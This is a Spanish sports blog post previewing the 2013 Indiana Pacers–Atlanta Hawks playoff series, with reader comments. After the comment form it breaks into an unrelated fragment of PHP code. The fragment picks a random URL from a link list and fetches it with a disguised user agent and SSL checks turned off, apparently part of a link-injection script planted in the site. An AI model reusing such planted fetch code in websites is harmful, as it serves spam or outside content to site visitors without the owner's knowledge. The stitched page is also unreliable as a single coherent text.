Previa Indiana Pacers – Atlanta Hawks

21 de April de 2013 por MagicJohnson32

Cuando vimos que los Hawks se dejaban ir en los últimos partidos de la regular season (por ejemplo, perdiendo estrepitosamente en casa ante los Raptors), todos asumimos que se trataba de evitar a los Heat hasta unas hipotéticas Finales de Conferencia. Y puede que ésa fuese la razón, pero si uno analiza esta eliminatoria de primera ronda ante los Pacers, también es probable que el objetivo principal fuera enfrentarse a Indiana, un equipo al que todos consideramos superior a Atlanta pero ante el que los Hawks han tenido un cierto éxito recientemente. Sin ir más lejos, los Pacers suman once derrotas consecutivas en el Phillips Arena.

Los argumentos de los Hawks no nos convencen. Los Pacers han completado una magnífica regular season, empañada sólo al final, cuando perdieron sus posibilidades de ser segundos y se reservaron para batallas mayores. Esas batallas han llegado y nadie duda de que volveremos a ver a ese equipo que no da tregua a su rival, el que provoca los porcentajes de tiros de campo y de triples más bajos de toda la liga, el que sella su aro y aprovecha cada error.

Claves de la eliminatoria:

  • Hibbert & West: no tienen los Hawks el físico ni los centímetros necesarios para derrocar a la pareja interior de los Pacers. Hibbert, pese a sus notables problemas para anotar durante los primeros meses de temporada, ha sido en todo momento la última línea de defensa de uno de los equipos más sobresalientes en este apartado. Sin Pachulia enfrente (más importante la baja del georgiano de lo que pueda parecer), nada debería impedirle castigar a los Hawks en ambos lados de la cancha. La tarea le será más fácil todavía si David West está acertado con el tiro de media distancia y mantiene a Josh Smith lejos del aro. Reto importante, el que espera a Horford.
  • A correr: ante un equipo con una defensa en estático tan efectiva como la de los Pacers, los Hawks han de aferrarse a las transiciones a lomos de Teague y Harris, dos jugadores que encuentran sus mejores versiones con pista por delante para correr. Lo mismo podemos decir de Josh Smith, que en ataque estático se empeña con frecuencia en tirar de lejos pero que como finalizador en el aro es imparable.
  • De tres en tres: probablemente veamos una cruenta batalla en las zonas, donde puede resultar complicado anotar entre el bosque de brazos que acechará cada lanzamiento. Así que el acierto que tengan por un lado George Hill y Paul George, y por el otro Kyle Korver pueden decantar algún partido de la serie. A propósito de eso… ¡qué bien le habría venido a Atlanta la presencia de Lou Williams en esta serie!

Pronóstico: 4-1 Pacers.

Comenta

5 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    4-1 es mucha tela… al menos al sexto sí que llegarán creo yo.

      Citar

  2. MagicJohnson32 dice:
    #2

    Sancho88:
    4-1 es mucha tela… al menos al sexto sí que llegarán creo yo.

    Casi me voy al 4-3, pero no sé, dudo que los Hawks ganen uno en Indiana, y sí veo a los Pacers sacando uno en Atlanta. De ahí el 4-1. Además, que los Pacers son mucho mejor equipo.

      Citar

  3. melo15 dice:
    #3

    Pues yo no veo tan clara la eliminatorio y doy bastantes opciones a los Hawks.
    Para empezar no se como West va a parar a Josh Smith y creo que Stepheenson, Green y Augustin van a estar toda la serie desaparecidos.
    El unico interrogante que veo es que no se como los Hawks van a defender a Paul George porque Korver…
    4-2 a Indiana pero sufriendo.

      Citar

  4. rumbero dice:
    #4

    melo15:
    El unico interrogante que veo es que no se como los Hawks van a defender a Paul George porque Korver…
    4-2 a Indiana pero sufriendo.

    Pues ibas muy bien encaminado porque parece que van a sufrir horrores para pararlo durante la serie. Korver no puede con él, le ha sacado 4 faltas en nada y le han puesto encima a Stevenson. Ya tiene el triple-doble en el bolsillo y eso que no ha estado fino en el tiro. Muy sólidos estos Pacers, como se dice en el análisis, parece que se estaban reservando para batllas mayores últimamente

      Citar

  5. melo15 dice:
    #5

    El problema esque los Hawks no tienen el ataque que hace falta para llegar lejos en postemparada.
    Ni Horford por recursos ni Josh Smith por IQ pueden llevar el ataque de un equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>